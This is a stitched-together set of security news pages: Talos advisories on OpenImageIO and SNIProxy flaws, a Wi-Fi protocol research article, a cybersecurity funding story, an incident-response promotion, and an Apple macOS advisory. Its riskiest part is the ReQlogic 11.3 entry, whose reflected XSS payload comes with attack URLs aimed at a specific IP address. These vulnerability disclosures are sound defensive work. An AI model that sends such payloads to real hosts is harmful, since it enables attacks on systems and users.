A denial of service vulnerability exists in the FitsOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide malicious input to trigger this vulnerability.

**SUMMARY**

A denial of service vulnerability exists in the FitsOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide malicious input to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenImageIO Project OpenImageIO v2.4.7.1

**PRODUCT URLS**

OpenImageIO - https://github.com/OpenImageIO/oiio

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-674 - Uncontrolled Recursion

**DETAILS**

OpenImageIO is an image processing library with easy-to-use interfaces and a sizable number of supported image formats. Useful for conversion and processing and even image comparison, this library is utilized by 3D-processing software from AliceVision (including Meshroom), as well as Blender for reading Photoshop .psd files.

CVE-2022-43595 was not fixed in newest version.

**TIMELINE**

2023-02-07 - Vendor Disclosure  
2023-02-13 - Vendor Patch Release  
2023-03-30 - Public Release

Discovered by Lilith >\_> of Cisco Talos.

CVE-2023-24472: TALOS-2023-1709 || Cisco Talos Intelligence Group

OpenImageIO is a library that converts, compares and processes various image files. Blender and AliceVision, two often used computer imaging services, utilize the library, among other software offerings.

Thursday, March 30, 2023 12:03

_Lilith >\_> of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered three vulnerabilities in the OpenImageIO image-parsing library that many popular pieces of 3-D rendering software use.

OpenImageIO is a library that converts, compares and processes various image files. Blender and AliceVision, two often used computer imaging services, utilize the library, among other software offerings.

Two of the vulnerabilities — TALOS-2023-1707 (CVE-2023-24473) and TALOS-2023-1708 (CVE-2023-22845) — could lead to the disclosure of sensitive information. An adversary could exploit these vulnerabilities by sending the target a specially crafted, malicious Targa (.tga) file.

TALOS-2023-1709 (CVE-2023-24472) is a denial-of-service vulnerability that is a continuation of TALOS-2022-1653 (CVE-2022-43594 and CVE-2022-43595). Talos first discovered CVE-2022-43595 in December, though it was not fixed in the most recent version of OpenImageIO.

Cisco Talos worked with OpenImageIO to ensure that these issues are resolved and an update is available for affected users, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: OpenImageIO Project, version 2.4.7.1. Talos tested and confirmed this version of the library could be exploited by this vulnerability.

The following Snort rule will detect exploitation attempts against this vulnerability: 61271, 61272, 61384 and 61385. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: Specially crafted files could lead to denial of service, information disclosure in OpenImageIO parser

A buffer overflow vulnerability exists in the handling of wildcard backend hosts of SNIProxy 0.6.0-2 and the master branch (commit: 822bb80df9b7b345cc9eba55df74a07b498819ba). A specially crafted HTTP, TLS or DTLS packet can lead to arbitrary code execution. An attacker could send a malicious packet to trigger this vulnerability.

**SUMMARY**

A buffer overflow vulnerability exists in the handling of wildcard backend hosts of SNIProxy 0.6.0-2 and the master branch (commit: 822bb80df9b7b345cc9eba55df74a07b498819ba). A specially crafted HTTP, TLS or DTLS packet can lead to arbitrary code execution. An attacker could send a malicious packet to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

SNIProxy 0.6.0-2  
SNIProxy Master 822bb80df9b7b345cc9eba55df74a07b498819ba

**PRODUCT URLS**

SNIProxy - https://github.com/dlundquist/sniproxy

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

SNIProxy (https://github.com/dlundquist/sniproxy) is an open source application that reverse proxies HTTP and TLS connections based on the requested hostname. It is distributed via package manager on several Linux distributions.

When wildcard backend hosts are used in SNIProxy configuration, an attacker could achieve remote code execution or denial of service by sending a crafted HTTP, TLS or DTLS packet.

The latest version on GitHub and the 0.6.0-2 Debian package were determined to be vulnerable. Note that while the original repository hasn’t been updated in several years, there are several forks of the original repository which are more active and may also contain this bug.

SNIProxy contains functions to parse addresses and hostnames, usually obtained by parsing the HTTP Host header or from a TLS server name indication (SNI) extension header. The new\_address() function parses arbitrary hostname or address strings into a usable format. This function is called when parsing the configuration file, and, more importantly, when parsing hostnames that are to be sent to a wildcard backend.

Example wildcard configuration (note the asterisk on the right side):

    table my_hosts {
        [a-z0-9]*\\.example\\.com *:443
    }
    

Normally, TLS libraries such as OpenSSL do not allow SNI hostname values to exceed 256 bytes. However, SNIProxy does not use an external library for this functionality. It implements its own basic parsing on the TLS header values, which allow longer values to be parsed. The same also applies to the HTTP “Host” header, which itself has no maximum length in an HTTP request. As such, SNIProxy will extract and accept hostnames of arbitrary lengths.

During code inspection, an issue was observed in the new_address() function in the code block that parses IPv6 address strings (e.g. “\[ff02::1\]”). The issue arises because the source length is used in a string copy rather than destination length when copying into a stack buffer of size 262. The source length is calculated based on the distance between the opening and closing square brackets, which can be more than 262 due to the behavior noted above with unrestricted hostname lengths. Because of this, the call to strncpy will overflow the ip_buf buffer, resulting in a stack buffer overflow.

    char ip_buf[262];
    ... snip ...
    /* [IPv6 address] */
    memset(&s, 0, sizeof(s));
    if (hostname_or_ip[0] == '[' &&
            (port = strchr(hostname_or_ip, ']')) != NULL) {
        len = (size_t)(port - hostname_or_ip - 1); // len can be longer than 262
        ...
        strncpy(ip_buf, hostname_or_ip + 1, len); // buffer overflow here
        ip_buf[len] = '\0';
    

**Exploit Proof of Concept**

Configure an SNIProxy instance with the following configuration:

    listen 0.0.0.0 443 {
        proto tls 
        table my_hosts
    }
    
    table my_hosts {
        .*test\\.example\\.com *:443
    }
    

Attached is a proof-of-concept that will either crash SNIProxy outright, or, in the case of missing compiler mitigations, may redirect SNIProxy’s execution flow to a specified memory address (in this case, the invalid address 0xdeadbeefdeadbeef).

**Mitigation**

This is a suggested patch for the affected code in the new_address() function in address.c, which prevents the string copy from overflowing the destination and ensures that the resultant buffer is null terminated: 
        strncpy(ip_buf, hostname_or_ip + 1, sizeof(ip_buf));
        ip_buf[sizeof(ip_buf) - 1] = '\0';

**TIMELINE**

2023-03-16 - Initial Vendor Contact  
2023-03-17 - Vendor Disclosure  
2023-03-17 - Vendor Patch Release  
2023-03-30 - Public Release

Discovered by Keane O'Kelley of Cisco ASIG.

CVE-2023-25076: TALOS-2023-1731 || Cisco Talos Intelligence Group

An attacker could exploit this vulnerability by sending a specially crafted HTTP, TLS or DTLS packet to the target machine, potentially causing a denial of service or gaining the ability to execute remote code.

Thursday, March 30, 2023 10:03

_Keane O’Kelley of Cisco ASIG discovered this vulnerability._

Cisco ASIG recently discovered a remote code execution vulnerability in the SNIProxy open-source tool that occurs when the user utilizes wildcard backend hosts.

SNIProxy proxies incoming HTTP and TLS connections based on the hostname contained in the initial request of the TCP session. This open-source tool allows for users to carry out name-based proxying of HTTPS without decrypting traffic or needing a key or certificate.

Talos discovered a remote code execution vulnerability (TALOS-2023-1731/CVE-2023-25076) that exists if the user is utilizing wildcard backend hosts when configuring SNIProxy. An attacker could exploit this vulnerability by sending a specially crafted HTTP, TLS or DTLS packet to the target machine, potentially causing a denial of service or gaining the ability to execute remote code.

Cisco Talos worked with the managers of SNIProxy to ensure that these issues are resolved and an update is available for affected users, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: SNIProxy version 0.6.0-2 and SNIProxy Master, version 822bb80df9b7b345cc9eba55df74a07b498819ba. Talos tested and confirmed these versions of the open-source tool could be exploited by this vulnerability.

The following Snort rule will detect exploitation attempts against this vulnerability:  
61474\. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: SNIProxy contains remote code execution vulnerability

A group of academics from Northeastern University and KU Leuven has disclosed a fundamental design flaw in the IEEE 802.11 Wi-Fi protocol standard, impacting a wide range of devices running Linux, FreeBSD, Android, and iOS.
Successful exploitation of the shortcoming could be abused to hijack TCP connections or intercept client and web traffic, researchers Domien Schepers, Aanjhan Ranganathan,

A group of academics from Northeastern University and KU Leuven has disclosed a fundamental design flaw in the IEEE 802.11 Wi-Fi protocol standard, impacting a wide range of devices running Linux, FreeBSD, Android, and iOS.

Successful exploitation of the shortcoming could be abused to hijack TCP connections or intercept client and web traffic, researchers Domien Schepers, Aanjhan Ranganathan, and Mathy Vanhoef said in a paper published this week.

The approach exploits power-save mechanisms in endpoint devices to trick access points into leaking data frames in plaintext, or encrypt them using an all-zero key.

"The unprotected nature of the power-save bit in a frame's header \[...\] also allows an adversary to force queue frames intended for a specific client resulting in its disconnection and trivially executing a denial-of-service attack," the researchers noted.

In other words, the goal is to leak frames from the access point destined to a victim client station by taking advantage of the fact that most Wi-Fi stacks do not adequately dequeue or purge their transmit queues when the security context changes.

Besides manipulating the security context to leak frames from the queue, an attacker can override the client's security context used by an access point to receive packets intended for the victim. This attack pre-supposes that the targeted party is connected to a hotspot-like network.

"The core idea behind the attack is that the manner in which clients are authenticated is unrelated to how packets are routed to the correct Wi-Fi client," Vanhoef explained.

"A malicious insider can abuse this to intercept data towards a Wi-Fi client by disconnecting a victim and then connecting under the MAC address of the victim (using the credentials of the adversary). Any packets that were still underway to the victim, such website data that the victim was still loading, will now be received by the adversary instead."

Cisco, in an informational advisory, described the vulnerabilities as an "opportunistic attack and the information gained by the attacker would be of minimal value in a securely configured network."

However, the company acknowledged that the attacks presented in the study may be successful against Cisco Wireless Access Point products and Cisco Meraki products with wireless capabilities.

To reduce the probability of such attacks, it's recommended to implement transport layer security (TLS) to encrypt data in transit and apply policy enforcement mechanisms to restrict network access.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

The findings arrive months after researchers Ali Abedi and Deepak Vasisht demonstrated a location-revealing privacy attack called Wi-Peep that also exploits the 802.11 protocol's power-saving mechanism to localize target devices.

The research also follows other recent studies that have leveraged the Google Geolocation API to launch location spoofing attacks in urban areas, not to mention use Wi-Fi signals to detect and map human movement in a room.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Wi-Fi Protocol Security Flaw Affecting Linux, Android and iOS Devices

Security analysts expect little improvement until at least the second half of the year.

Financial activity in the cybersecurity industry declined sharply in the first quarter of 2023 compared to the same period in 2022, and analysts tracking the sector expect little improvement until at least the second half of the year.

Even that expectation is tinged with some uncertainty over how the market will respond — in the short and long term — to Silicon Valley Bank's (SVB) stunning collapse in mid March and the resulting impact on venture capital funding in the sector.

And meanwhile, next quarter in fact might be the slowest for cybersecurity startup funding in years, at least one researcher predicts.

**Continued Financial Headwinds for Cyber**

"Conservatism and expectations for continued headwinds throughout 2023 were the recurring themes across the public cybersecurity company annual earnings calls held throughout the first quarter," says Eric McAlpine, founder and managing partner at Momentum Cyber. "\[Strategic decision makers\] are approaching the rest of the year with great caution and that has downstream impact for everyone else in the ecosystem."

The cautionary tone comes amid lingering fears of a broad economic recession, falling stock prices and huge layoffs at technology giants such as Amazon, Meta, Microsoft, and Tesla. Though analyst firms such as IDC expect cybersecurity spending to increase 12.1% in 2023 to $219 billion, there are some fears that inflation and rising technology costs could dent the gains organizations are hoping to get from the increased spending.

McAlpine says that through Feb. 28, Momentum Cyber has tracked 32 cybersecurity M&A deals totaling $2.6 billion in disclosed deal value and 102 financing deals totaling $2.5 billion in value. That is down sharply from the M&A deal volume of $13.8 billion across 79 deals that Momentum Cyber tracked in the year-ago quarter. In Q2 last year, that number surged to a record $89.8 billon before dipping sharply in the last half of the year.

"Both M&A and financing deal count and dollar value are down considerably from the same period in 2022 as we continue to deal with turbulent markets," he says.

Market research firm Omdia reported a similar slowdown in the first quarter of 2023 with analyst Ketaki Borade describing the volume of M&A transactions so far this year as just over half of last year's volume in the same period: 44 versus 97 in 2022.

Notable M&A examples in the first quarter of 2023 include Thoma Bravo’s $1.1 billion acquisition of Magnet Forensics, Francisco Partners' purchase of Sumo Logic for $1.7 billion, and SailPoint's acquisition of SecZetta for an undisclosed sum in January.

**Broad Investment Slowdown, Including in VC**

It was not just M&A activity that slowed in the first three months of 2023. Venture capital and other investment activity in cybersecurity companies declined as well says Richard Stiennon, chief research analyst at market research firm IT-Harvest.

Stiennon says IT-Harvest tracked a total of 41 investments totaling some $1.35 billion in cybersecurity companies through March: "That is at an annual rate of only $8 billion \[which is\] considerably down from 2022, which saw investments of $17 billion, and 2021, which set an all-time high of $24 billion." 

Of the 41 investments, there were seven rounds of $50 million or more which accounted for $893 million of the total $1.35 billion, Stiennon says. There have been no initial public offerings (IPOs) so far this year.

Despite the general slowdown in cybersecurity M&A and investment activity, the first three months of 2023 had its share of major transactions. Easily the standout among them was Israeli cloud security vendor Wiz' capital raise of $300 million in a Series D financing round in February that valued the company at an astounding $10 billion, Stiennon says. That made Wiz the highest valued private cybersecurity firm ever.

Stiennon points to a $205 million growth funding round that identity management vendor Saviynt secured from AB Private Credit Investors and $180 million in equity investments and strategic financing that MDR vendor Deepwatch raised in February, as two other major deals in 2023's first quarter. Yet another was a $500 million capital raise by Alphabet spinoff Sandbox AQ in February.

**Hot Sectors**

As has always been the case, some segments within the cybersecurity industry received more love from investors than other segments. Rik Turner, an analyst with Omdia, identified the segments that have received the largest amounts of funding so far in 2023 as network security, security management, and SecOps. These sectors have perennially been attractive to investors, he says. 

"Others such as cloud, application, and data security are now also mainstays within the overall totals," Turner says. "\[The trend\] speaks to the growing amount of cloudification of app infrastructures, which was already underway before the pandemic, but was undoubtedly turbocharged by it."

Several of the technologies that investors are betting on are also — unsurprisingly — the areas where enterprise organizations are spending most of their security dollars on as well. In a recent Dark Reading virtual event, Chenxi Wang, founder and general partner of Rain Capital, identified cloud security, network security, identity and access management, SecOps, and application security as some of the top spending priorities for organizations currently.

In comments to Dark Reading, Wang says based on her observation, overall deal volumes and the velocity of strategic deals decreased in the first three months of 2023. "We observed the same thing on the venture side. Less companies are getting funded compared to last year."

**A Cautious Cyber-Investment Outlook for the Rest of 2023**

Wang and other industry analysts have a somewhat cautious outlook on M&A and investment activity in the cybersecurity sector for the rest of the year. 

One major issue is how SVB's demise will playout over the rest of the year. Wang believes — like many others — that the SVB collapse will make it harder for startups and early-stage companies — especially those with a high-risk appetite — to get funding. 

"In the long run, it means less companies will cross the chasm to scale up and become a sustainable business," she says.

McAlpine is less concerned about the short-term implications of SVB's implosion. The immediate slowdown in financial activity that the bank's collapse triggered has already begun reversing itself. But the longer-term impact may not be evident for years. 

"Going forward, we're advising companies to avoid putting all their eggs in one basket," he says. "Working with multiple banks, for example, \[such as\] one global bank and one regional bank, can help to avoid business interruptions during this period of volatility in the banking system."

He expects that things will start to loosen up sooner rather than later. Financing and M&A activity can't remain in a state of limbo forever, he says. Many companies will still need capital to reach the next stage of their business, even if they're able to adjust and extend their runway near term. "We also expect to see more companies take a parallel approach where they pursue financing and M&A at the same time," he says. "This gives them optionality if one or the other doesn't materialize at a valuation that's acceptable to founders and investors."

Steinnon, who expected a lot of funding that didn't happen last year to be pushed into 2023, says he is underwhelmed by what he has seen so far this year. But he predicts investment and M&A activity will begin ticking upward starting in the third quarter and will at least match 2020's total of $10 billion. 

He predicts that the second quarter of 2023 will be the slowest investment quarter in years in the cybersecurity industry. 

"Fallout from SVB's failure is going to have a negative impact on all funding, including in cybersecurity," he says. "I fully expect private equity to take advantage of decreased valuations \[and\] to snap up deals from the public and private sectors."

Cybersecurity Investment Outlook Remains Grim as Funding Activity Sharply Declines

Whether it be threat hunting, an active defense posture or just improving security instrumentation alerts and logs an organization keeps, it’s best for every user — no matter the size — to be prepared for when a cybersecurity incident or breach occurs.

Wednesday, March 29, 2023 08:03

We’ve written before about the importance of taking a proactive approach to cybersecurity.

Whether it be threat hunting, an active defense posture or just improving security instrumentation alerts and logs an organization keeps, it’s best for every user — no matter the size — to be prepared for when a cybersecurity incident or breach occurs.

We saw this recently with a customer in the education industry vertical. The customer leveraged their Cisco Talos Incident Response retainer after conducting some proactive threat hunting to notify us that they identified some suspicious activity on their network. Talos IR responders quickly noticed that just a single box on the customer’s network alerted, and we isolated the intrusion to a single endpoint within the network. Talos IR concluded with high confidence that the adversary had compromised just a single endpoint with a single, compromised credential. This strong collaborative approach from the customer and Talos allowed us to quickly contain and eradicate the adversary from the environment.

Our Talos IR 2022 Q3 Quarterly Trends reflect pre-ransomware and ransomware activity being the top threat and this continues a trend that we’ve seen across the threat landscape where adversaries are increasingly carrying out pre-ransomware activities to establish a foothold on a network rather than diving in head-first with a full-blown ransomware attack. Regulation and small-medium business targets may be factors for adversaries evolving extortion tactics versus deploying ransomware within a compromised environment. Potential attack targets may just see smaller, potentially innocuous activities from an adversary that doesn’t have to include the encryption of files on a network and request for a ransom payment.

As outlined in Talos’ 2022 Year in Review, education is a particularly vulnerable sector and we expect adversaries to increase the targeting of schools and universities over the summer when students start to return to classes after break.

If you want to detect, quickly respond and eradicate an adversary like this customer, you need to have incident response expertise in place. Cisco Secure’s Security Outcomes Report recently found that there was 11 percent difference in average resilience scores between organizations that have an external incident response retainer versus those that don’t.

A foundational component of this proactive plan is a Cisco Talos Incident Response Retainer. If a Talos IR retainer customer sees something suspicious, we’re there immediately to respond and determine what containment actions are appropriate and if a further forensic investigation is required. Just because you are not experiencing file encryption in your environment does not mean that an adversary doesn’t have the capability to deploy ransomware leading to a business-impacting cybersecurity incident. It is common for an adversary to gain initial access to a target organization and maintain access.

With an incident response retainer, an organization doesn’t have to conglomerate a plan or response together. Instead, it’s a one-size-fits-all package that includes tabletop exercises, cyber range training, purple teaming, intelligence on-demand, and much more. Then, if (more likely when) your worst career day occurs and your organization is the target of a cyber-attack, Talos IR stands at the ready to help the team respond immediately to detect and eradicate an advanced or determined adversary.

We’ll be covering more about Incident Response retainers in our upcoming Talos IR On Air live stream on April 27 at noon Eastern, which you can watch on our LinkedIn and Twitter pages live.

With a retainer from Talos IR, organizations and users will have peace of mind that they have a trusted digital forensic and incident response team ready at any time. There’s no need to purchase emergency incident response services from one vendor, training exercises from another and a third vendor to assist in the creation of an incident response plan to prepare for the next time there’s an incident. Talos IR offers all these services in one package with a retainer.

If a customer doesn’t have a breach or an incident, there are many ways to leverage Talos IR proactively by enlisting us to lead your team through a hypothetical tabletop exercise or conducting a compromise assessment to identify potential gaps in your network before the adversaries can.

Even if your organization doesn’t already have Cisco products in place, Talos IR can work with you — we’re completely vendor-agnostic. Whatever tools and software you have, we’re here to help.

No matter what tools you must detect or scan for the next threat, our responders can start their work immediately to remediate the threat. If you require new hardware or software solutions, our team can always help with that, too.

If you are already a Cisco customer, a Talos IR retainer is the perfect way to continue your security journey with us and become more resilient. We’ll find the full capabilities of your security team and then develop a prescriptive plan for how your security team can best work with us over the lifetime of the retainer. The team that starts working with you from the first day you sign onto a retainer will be there with you.

If you’d like to learn more about a Talos IR retainer, please reach out to us through our website, and tune into the next Talos IR On Air to hear more about this service.

How an incident response retainer can drive proactive security

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

Apple Security Advisory 2023-03-27-5 - macOS Big Sur 11.7.5 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-5 macOS Big Sur 11.7.5

macOS Big Sur 11.7.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213675.

Apple Neural Engine  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher, Antonio Zekic  
(@antoniozekic), and John Aakerblom (@jaakerblom)

AppleMobileFileIntegrity  
Available for: macOS Big Sur  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Big Sur  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Big Sur  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

Carbon Core  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-23534: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Big Sur  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Big Sur  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Find My  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

Foundation  
Available for: macOS Big Sur  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: macOS Big Sur  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

NetworkExtension  
Available for: macOS Big Sur  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-27962: Mickey Jin (@patch1t)

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Big Sur  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Big Sur 11.7.5 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxks0hAAquqDdtX6QvjVigRuSd2bpQny1TxVp62Zo47F9YkrvuvKVvJjaFzQJNjE  
p2Oq3BgNBkUqei26w8GLqwbg8szhCIPCOVHFcGDTPGrf53oWLlPc6WZxn8ihZOo4  
r3rxH4MGFSb+dBwWnF6GVX1EBcVjO08FwOzgNqkh2baqSU0iuxnSRW9XYmzwhG1w  
bj86kfnCooSLJlUTiTbXxN8W/vmfwRWONXQTkkOa47knWSKH9QBzzfAJKbil6sRE  
hDiYdtXUER//PApErvjl5i6b5wRQ0KQ19X//XfZzJtWCPuh0/nw7ducHJg+DpPUc  
EfNINhPKauqUvw516EvDuW0yVIlyMrfNCJOpHwQkmCfqx2i6l1+U5M8yqsyVcpbe  
Nbs6LYMNvDalLnazRRA3oT3036MrnCWem/M1afTrsoHYnhYb8FMx9gI3GV2Swgud  
fJrPttdjtpwlrCF60KsquJEvmcrNFwKk+QKS8Gbe8bbJSPk1AGsHN1JivFNiC036  
fycIK1ffwPHPYJgF6rLCOQ9q+DHRTw+lR0UrGmRplrjVBwt9cdiuLaeJZWPyGMwP  
P5QYlkULAE+5B4HKqzKMFYPkoEMzmvdOsgbhcg7OSmP1PAiAW6m7HnOmDAX7E2El  
